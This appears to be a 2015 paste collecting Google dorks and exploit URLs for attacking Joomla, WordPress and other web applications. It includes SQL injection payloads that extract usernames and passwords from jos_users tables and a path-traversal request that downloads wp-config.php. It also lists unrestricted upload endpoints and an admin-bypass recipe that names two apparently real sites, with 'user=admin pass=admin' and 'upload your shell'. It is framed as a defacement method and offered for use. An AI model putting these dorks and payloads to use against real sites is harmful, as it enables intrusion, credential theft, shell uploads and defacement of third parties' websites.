dork joom

GTP
Sep 4th, 2015
# Exploit Title: Joomla Spider Calendar 3.2.6 SQL Injection
# Vendor Homepage: http://web-dorado.com/
# Google Dork: inurl:option=com_spidercalendar
# Exploit: /index.php?option=com_spidercalendar&calendar_id=1
----
Exploit : http://web/wp-content/plugins/revslider/temp/update_extract/exp.php

Dork :

inurl:wp-content/plugins/revslider/

inurl:revslider

inurl:revslider_admin.php

inurl:revslider_front.php

inurl:plugins/revslider/

intext:Powered by Revslider

intitle:"Index Of/ revslider"

intitle:"Index Of/wp-content/themes/revslider"

intitle:"Index Of/wp-content/plugins/revslider"

intitle:"Index Of/admin/revslider"

intitle:"Index Of/fr/revslider"

intitle:"Index Of/en/revslider"

intitle:"Index Of/us/revslider"

intitle:"Index Of/ar/revslider"

intitle:"Index Of/es/revslider"

intitle:"Index Of/de/revslider"
-----
Easy-exploit-joomla-Sites
Dork:inurl:"index.php?option=com_simplephotogallery"

/index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10,11,12+from+jos_users--+
-----
Joomla Components (com_ignitegallery) SQL-Injection Vulnerabilities -

Dorks: inurl:com_ignitegallery , Exploits: /index.php?
option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)UAH,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
-----
Joomla Exploit : com maian15

Dork : "inurl:option=com_maian15"

Exploit:

/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?
-----
Deface method: WordPress bazar Theme Arbitrary File Download Vulnerability

Dork: inurl:wp-content/themes/bazar/
exploit: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
-----
exploit bypass admin
inurl
allinurl:galimg
inurl:galorg
index of /galorg site:ae
target
http://mspmt.com/adminaccess/welcome.asp
http://www.extrememarineme.com/adminaccess/welcome.asp
add
adminaccess/welcome.asp
user=admin pass=admin
adminaccess/gallery.aspx
upload your shell
http://mspmt.com/
-----
Upload dork and exploit :3
Dorks :

inurl:/upload.php
inurl /uploadbutton.html
inurl /upload-form.php
inurl /upload/up.php
inurl /upload.html
-----
Dokeos Upload

Dork:inurl:/index.php?include=Overview.html
Exploit:/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php
-----
Dork : inurl:"admin/my_documents/my_files"
Exploit : admin/rte_popup_file_atch.asp
-----
Dork:inurl:"/mfm.php"
-----
Dork:intitle:"index of" people.lst.